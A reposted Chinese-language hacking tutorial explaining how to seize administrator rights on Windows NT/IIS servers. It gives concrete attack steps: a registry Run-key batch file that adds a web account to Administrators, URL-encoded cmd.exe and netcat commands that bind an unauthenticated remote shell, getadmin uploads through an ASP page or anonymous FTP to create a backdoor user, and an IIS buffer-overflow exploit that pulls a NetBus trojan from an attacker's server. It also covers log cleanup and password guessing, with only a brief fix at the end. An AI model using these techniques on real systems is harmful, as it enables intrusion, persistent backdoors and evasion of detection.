獲取NT的admin權限的方法

轉自INTERNET

一、通過修改註冊表
凡是具有登錄NT本機的用戶，例如IUSR_machine，都具有對 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 項的可讀可寫權限，該用戶可以遠程訪問這個項。比如，他可以創建一個bat文件，文件內容為: cmd.exe /c net localgroup administrators
IUSR_machine /add，把該文件copy到winnt目錄下，然後在註冊表上述的項添加一個數值，指向這個文件。
那麼，當下次Admin登錄到該機器上時，就會自動把IUSR_machine添加到Administrators組。
另，註冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以這麼做。

二、自建telnet服務在NT上執行指令
要求用戶有文件上傳權限，而且該目錄位於web目錄下，該目錄允許執行
下面是具體步驟
假設你的目錄是www.xxx.com/frankie
那麼,把cmd.exe(位於C:\winnt\system32\cmd.exe)和Netcat裡面包含的nc.exe傳到這個目錄上去，
然後,在瀏覽器端輸入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
這時候,你的瀏覽器將停止不動,實際上,server上的Telnet的服務已經產生了:
這時,用Telnet連接www.xxx.com的23端口,你發現,不用密碼,不用登陸,對方C:\提示符已經出現在你的眼前!更妙的是,這個Telnet server是一個一次性的服務,當客戶端一退出,該服務也將終止.
Netcat不同於一般的特洛伊木馬,它可以構建任何的TCP連接服務.在瀏覽器端輸入上述的字符串,等價於在NT的Dos方式下輸入: nc -l -p 23 -t

-e cmd.exe 這將把cmd.exe綁定到23端口上

三、入侵NTserver典型途徑V2.0
簡介
1、如果你有NT/IIS服務器的任何一個帳號,哪怕是guest帳號,都可以獲得root
2、用netcat和iishack可以獲得root
3、iusr_計算機名這個帳號有ftp上傳,web執行等權限.
4、在web server上執行程序是入侵NT的關鍵
5、要在web server上執行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執行權限的目錄上去
在本文中,目標機器的名稱是ntsvr2,目標機器的域名是www.xxx.com,目標機器上有scripts和cgi-bin目錄,scripts目錄下有uploadn.asp等asp

程序,可能有guest帳號,肯定有iusr_ntsvr2這個帳號:
第一個方法,用iusr_ntsvr2後者guest這兩個帳號,這裡假設我們已經破解了這個帳號的密碼:
在瀏覽器輸入:
http://www.xxx.com/scripts/uploadn.asp
guest和iusr_ntsvr2這兩個帳號都可以進這個asp頁面
在這裡把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄.
然後輸入:http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
大約十多秒後屏幕顯示:
CGI Error
這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add
這樣就創建了一個叫china用戶,密碼是news,然後:
http://www.xxx.com/scripts/getadmin.exe?china
第二個方法,用匿名ftp:
如果允許匿名帳號ftp登陸的設定,也給我們帶來了突破NT server的機會。我們用ftp登陸一個NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).
ntsvr2這個東西暴露了其NETbios名,那麼在IIS的背景下,必然會有一個IUSR_ntsvr2的用戶帳號,屬於Domain user組，這個帳號我們以後要用來

獲取Administrator的權限
User (www.xxx.com:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 輸入 guest@ 或者guest
對於缺乏網絡安全知識的管理員來說,很多人沒有將guest帳號禁止,或者沒有設置密碼。那麼guest帳號就是一個可用的正確的用戶帳號，雖然只屬於Domain guest組在這種情況下我們就可以進NT server的ftp了。
進去以後,看看目錄列表,試試 cd /scripts 或cgi-bin等關鍵目錄,如果運氣好,改變目錄成功，這時你就有了80%的把握。
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin
然後輸入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
大約十多秒後屏幕顯示:
CGI Error
這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員 下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add
這樣就創建了一個叫china用戶,密碼是news,然後:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帳號登陸,就可以有最大的權限了,也可以用上面的cmd.exe的方法直接修改如果沒有cmd.exe,也可以自己傳一個上去到

scripts/tools或者cgi-bin目錄

第三個方法,用netcat和iishack
如果你熟悉使用Netcat這個工具,你就知道,netcat可以利用NT的弱點在其上綁定端口,下面用eEye的工具已經介紹過,如果你熟悉Netcat,成功的可能性會更大:

IIS的ISAPI的毛病(*.HTR) 我們再來看看eEye最近這兩天發現的一個關於NT/IIS的問題和工具.在IIS的/Inetsrv目錄下,有個DLL文件叫

ism.dll,這個模塊在web運行的時候就被加載到較高的內存地址,並且導致了零字節問題到處出現
IIShack.asm ,利用這個毛病,eEye寫了兩個程序:
iishack.exe
ncx99.exe,為達目的你必須自己有一個web server,把ncx99.exe和

netbus木馬傳到這個web server的目錄下,比如你的web server是:
www.mysvr.com? 而對方的IIS server是www.xxx.com
則: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe ?? (注意,不要加http://字符!)
上述命令輸入後這時你應該可以看到
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- [email protected].
http://www.eEye.com
[usage: iishack ] eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!

然後,再把Netbus等特洛伊木馬傳到對方機器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe實際上是有名的Netcat的變種,它把對方server的cmd.exe綁定到Telnet服務
ncx.exe 這是較早的版本,是把端口綁到80的,由於80端口跑web服

務,端口已經被使用.所以可能不一定有效
然後,用Telnet到對方的99或80端口:
Telnet www.xxx.com 99
結果是這樣:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>[You have full access to the system, happy browsing :)] C:\>[Add a scheduled task to restart inetinfo in X minutes] C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\>[Clean up any trace or logs we might have left behind.]

這樣,你就完全控制了其硬盤上的文件!注意,如果你type exit退出,對方server上的這個進程也會退出
參考資料: eeye.zip

補救方法:在IIS的www service屬性中將主目錄的應用程序設置的*.htr的映射刪除
微軟對這個問題的正式回應

其它:用Retina.exe得到NT域內的帳號清單,逐個嘗試這些帳號,如果有的密碼薄弱而被你猜出來,就可以用上面的方法來獲取NT的admin
不明白的地方請看黑客世界最新更新的有關NT的系列文章
版權屬於CCSDT&Frankie所有

解決方案
控制一般用戶對註冊表Run項的可寫權限
打最新的Services Pack